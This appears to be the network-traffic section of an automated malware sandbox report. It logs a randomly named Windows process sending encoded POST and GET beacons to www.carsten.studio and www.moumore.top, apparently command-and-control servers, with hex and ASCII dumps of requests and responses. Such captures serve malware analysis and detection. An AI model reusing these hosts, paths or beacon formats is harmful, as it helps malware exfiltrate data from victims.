User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 57 45 36 42 71 35 4c 66 54 30 32 43 7a 76 2b 6b 64 45 53 70 44 55 34 44 4a 79 6f 4b 44 32 72 47 51 71 53 6f 39 75 36 33 63 45 34 64 38 31 42 62 2f 41 36 44 4c 54 38 79 36 52 50 44 54 38 37 78 78 71 57 45 74 64 32 4f 62 4f 2f 4a 6e 31 76 4e 51 76 52 34 33 38 63 67 46 79 55 4c 36 69 68 4d 49 50 6e 32 32 2b 43 43 32 4a 75 4b 55 50 78 31 46 65 34 44 55 70 6f 42 70 67 6d 67 57 71 43 4a 33 58 4e 41 6a 61 4b 66 44 64 51 5a 6d 6e 59 43 58 4b 2f 38 6e 44 45 78 49 37 78 76 49 62 45 32 35 65 48 34 64 35 49 41 55 6a 53 4e 42 6a 54 73 57 68 68 6a 56 64 68 72 38 55 61 47 65 6e 64 6d 47 4a 4b 35 47 30 42 34 58 72 30 3d
                                                  Data Ascii: 5lf8fv8H=CoChSON0L06JWE6Bq5LfT02Czv+kdESpDU4DJyoKD2rGQqSo9u63cE4d81Bb/A6DLT8y6RPDT87xxqWEtd2ObO/Jn1vNQvR438cgFyUL6ihMIPn22+CC2JuKUPx1Fe4DUpoBpgmgWqCJ3XNAjaKfDdQZmnYCXK/8nDExI7xvIbE25eH4d5IAUjSNBjTsWhhjVdhr8UaGendmGJK5G0B4Xr0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49914 | 217.160.0.200 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:56:37.921024084 CET | 10832 | OUT | POST /bdk6/ HTTP/1.1
Host: www.carsten.studio
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: close
Content-Length: 10305
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Origin: http://www.carsten.studio
Referer: http://www.carsten.studio/bdk6/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 57 45 36 42 71 35 4c 66 54 30 32 43 7a 76 2b 6b 64 45 53 70 44 55 34 44 4a 79 6f 4b 44 33 54 47 54 5a 71 6f 38 4e 53 33 64 45 34 64 69 46 42 61 2f 41 37 42 4c 54 30 32 36 52 53 2b 54 2b 44 78 6a 63 71 45 38 38 32 4f 52 4f 2f 4a 73 56 76 49 66 50 51 67 33 38 73 6b 46 79 6b 4c 36 69 68 4d 49 4a 62 32 31 73 71 43 37 70 75 4e 46 50 78 78 42 65 34 37 55 70 51 2f 70 67 6a 64 57 61 69 4a 33 33 64 41 68 49 53 66 4c 64 51 62 72 48 59 4b 58 4b 79 69 6e 44 59 54 49 34 74 52 49 5a 59 32 37 61 66 6b 47 4a 59 57 41 31 36 67 52 51 6e 79 61 54 74 2f 62 74 35 4f 74 6b 44 47 4d 57 52 72 64 37 76 52 52 30 68 75 4a 38 67 32 4f 64 48 4e 51 49 33 2f 46 6f 42 46 67 59 70 66 57 56 37 4f 34 6f 76 67 51 71 35 51 62 63 59 34 6e 64 35 71 69 6f 6a 48 73 70 42 70 4b 63 78 32 44 76 41 4f 37 78 67 7a 65 76 46 57 39 48 52 75 47 4d 4e 72 30 39 56 6b 45 49 73 2f 50 30 33 31 61 35 4e 56 63 45 52 2f 57 6b 44 63 4c 68 6e 54 51 78 76 49 77 77 61 69 31 78 6b 37 2b 57 53 46 4b [TRUNCATED]
                                                  Data Ascii: 5lf8fv8H=CoChSON0L06JWE6Bq5LfT02Czv+kdESpDU4DJyoKD3TGTZqo8NS3dE4diFBa/A7BLT026RS+T+DxjcqE882ORO/JsVvIfPQg38skFykL6ihMIJb21sqC7puNFPxxBe47UpQ/pgjdWaiJ33dAhISfLdQbrHYKXKyinDYTI4tRIZY27afkGJYWA16gRQnyaTt/bt5OtkDGMWRrd7vRR0huJ8g2OdHNQI3/FoBFgYpfWV7O4ovgQq5QbcY4nd5qiojHspBpKcx2DvAO7xgzevFW9HRuGMNr09VkEIs/P031a5NVcER/WkDcLhnTQxvIwwai1xk7+WSFKEr0/Vps7Ma83D5te/ZrCuRNAQrarLTIt8vAQVLVAwPd+yoNpjAXFlhNT9LK4K/8yLqVFgsEWDdEss9iSVOIe/V1NNoHaid/KL8Ju75Fz/jyfQ3CSzz2EtAmE/XryjNq67rmPI6PlA0Fqacx9MPDhZkXqjwBWj3RfvtBq3ATmrLUgAMtfOja2m2Ta9yfm5SFk2ybckJCfaODLMfT4zoqUrm1XtpNBjjmpmuzm3Rw/5fjtKlC4ydCRk3HFNKXbCfP+39b9BzQ6o6fghGFZPkVxkZTa9H+748Lf4gTFwrZ0mGv08guH68JEWPfb7LLYiM6LJXU3sSd2M5IhI0RZ09Yfe1cAZPMfMKLU3FWAeuuADMH1z14gKbDxr7YF3JhAPCgymYsQD+tf40nlTSHhhvpa2ab2pfSoCbXU2emEJEXENlaeHWQnP1M0aIXMV1R504ZIQeXD3nle+Ts28LzJm+DXbMs/57gvVCGFSX75v54G+yjLKfXYykM47T7FgJMstgmPaLdLdPVSNwdrmDQylh+KY3N3k6F0BPaMOdsaTGxj4lzYnF4RnRVYJEdr1kq/TD+T/57PAW2BJ0EhGCYdOq7pR2ixiiioobUTFxY+R+uxp3ltSsms61WsTNYpYgzGJsowI+JbEaDHVOlRYy99Q7u8Z8pb7N+CqqUcRq [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49927 | 217.160.0.200 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:56:40.467340946 CET | 464 | OUT | GET /bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d HTTP/1.1
Host: www.carsten.studio
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Nov 19, 2024 03:56:41.740046024 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4545
Connection: close
Date: Tue, 19 Nov 2024 02:56:41 GMT
Server: Apache
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Nov 19, 2024 03:56:41.740094900 CET | 1236 | IN | Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
Nov 19, 2024 03:56:41.740112066 CET | 1236 | IN | Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
Nov 19, 2024 03:56:41.740128040 CET | 975 | IN | Data Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49961 | 203.161.46.205 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:56:47.609901905 CET | 721 | OUT | POST /cdzk/ HTTP/1.1
Host: www.moumore.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: close
Content-Length: 205
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Origin: http://www.moumore.top
Referer: http://www.moumore.top/cdzk/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 37 33 2b 34 79 7a 6f 78 43 70 47 4d 33 68 4a 7a 73 33 44 72 4b 55 6c 67 55 35 44 35 32 68 6f 4c 63 43 36 74 36 30 74 43 64 5a 49 50 36 49 46 62 41 46 41 55 76 52 61 6a 6b 36 75 6f 7a 58 43 43 42 57 75 41 77 43 45 65 42 6c 42 45 36 6a 47 38 30 68 61 74 37 62 73 69 66 4f 4e 74 73 57 65 51 63 51 58 2b 77 47 2b 5a 44 6a 6a 62 76 52 49 53 2b 59 75 62 65 78 79 36 6f 77 2f 49 71 59 76 50 77 73 75 7a 6b 4c 4a 74 44 61 75 45 76 61 78 77 73 74 74 71 47 49 4f 4d 4d 62 50 65 32 6f 50 52 53 37 72 63 38 62 2f 34 62 31 79 78 2b 52 70 77 59 4e 58 71 44 6f 59 7a 77 35 33 51 30 4c 35 48 30 67 3d 3d
                                                  Data Ascii: 5lf8fv8H=73+4yzoxCpGM3hJzs3DrKUlgU5D52hoLcC6t60tCdZIP6IFbAFAUvRajk6uozXCCBWuAwCEeBlBE6jG80hat7bsifONtsWeQcQX+wG+ZDjjbvRIS+Yubexy6ow/IqYvPwsuzkLJtDauEvaxwsttqGIOMMbPe2oPRS7rc8b/4b1yx+RpwYNXqDoYzw53Q0L5H0g==
                                                  Nov 19, 2024 03:56:48.389317989 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:48 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                  Nov 19, 2024 03:56:48.389386892 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                  Nov 19, 2024 03:56:48.389441967 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                  Nov 19, 2024 03:56:48.389549971 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                  Nov 19, 2024 03:56:48.389585972 CET1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                  Nov 19, 2024 03:56:48.389626980 CET1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                  Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                  Nov 19, 2024 03:56:48.389659882 CET1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                  Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                  Nov 19, 2024 03:56:48.389695883 CET1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                  Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                  Nov 19, 2024 03:56:48.389729977 CET1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                  Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                  Nov 19, 2024 03:56:48.389765024 CET460INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                  Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                  Nov 19, 2024 03:56:48.394925117 CET1236INData Raw: 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f
                                                  Data Ascii: 2,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-1


                                                  Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49973 | Destination IP: 203.161.46.205 | Destination Port: 80 | PID: 4628 | Process: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 03:56:50.155286074 CET | 741 | OUT | POST /cdzk/ HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.moumore.top
                                                  Referer: http://www.moumore.top/cdzk/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 37 33 2b 34 79 7a 6f 78 43 70 47 4d 32 42 35 7a 67 32 44 72 42 55 6c 6a 65 5a 44 35 38 42 6f 48 63 43 32 74 36 31 35 6f 63 72 63 50 37 6f 31 62 44 45 41 55 6f 52 61 6a 75 61 75 68 72 33 43 46 42 58 53 6d 77 44 6f 65 42 6c 46 45 36 6a 57 38 30 32 4f 69 70 37 73 6b 5a 4f 4e 6a 68 32 65 51 63 51 58 2b 77 47 61 7a 44 6a 4c 62 73 69 41 53 2f 35 75 61 58 52 79 37 2b 67 2f 49 37 6f 76 4c 77 73 75 4e 6b 4a 38 47 44 63 69 45 76 61 42 77 73 38 74 74 50 49 4f 4b 43 37 50 56 33 49 65 74 56 49 4f 63 38 59 43 66 44 30 61 4b 79 33 6b 71 4a 38 32 39 52 6f 38 41 74 2b 2b 6b 35 49 45 4f 76 76 77 76 66 79 36 45 48 6b 6a 72 4f 68 2f 53 2f 5a 6f 6d 59 34 38 3d
                                                  Data Ascii: 5lf8fv8H=73+4yzoxCpGM2B5zg2DrBUljeZD58BoHcC2t615ocrcP7o1bDEAUoRajuauhr3CFBXSmwDoeBlFE6jW802Oip7skZONjh2eQcQX+wGazDjLbsiAS/5uaXRy7+g/I7ovLwsuNkJ8GDciEvaBws8ttPIOKC7PV3IetVIOc8YCfD0aKy3kqJ829Ro8At++k5IEOvvwvfy6EHkjrOh/S/ZomY48=
                                                  Nov 19, 2024 03:56:50.916845083 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:50 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
